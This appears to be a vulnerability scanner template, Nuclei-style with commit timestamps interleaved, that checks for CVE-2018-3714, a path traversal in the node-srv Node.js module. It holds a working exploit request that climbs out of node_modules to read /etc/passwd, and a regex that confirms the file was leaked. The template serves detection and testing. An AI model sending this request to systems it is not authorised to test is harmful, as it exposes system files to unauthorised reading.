2021-01-02 05:00:39 +00:00
id : CVE-2018-3714
2020-07-05 15:49:09 +00:00
info :
name : node-srv Path Traversal
author : madrobot
2021-09-10 11:26:40 +00:00
severity : medium
2021-02-05 19:44:41 +00:00
reference : https://hackerone.com/reports/309124
2021-03-18 07:54:36 +00:00
tags : cve,cve2018,nodejs,lfi
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score : 6.50
cve-id : CVE-2018-3714
cwe-id : CWE-22
description : "node-srv node module suffers from a Path Traversal vulnerability due to lack of validation of url, which allows a malicious user to read content of any file with known path."
2020-07-05 15:49:09 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/node_modules/../../../../../etc/passwd"
2020-07-08 11:38:57 +00:00
matchers-condition : and
2020-07-05 15:49:09 +00:00
matchers :
- type : status
status :
- 200
- type : regex
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2020-07-05 15:49:09 +00:00
part : body
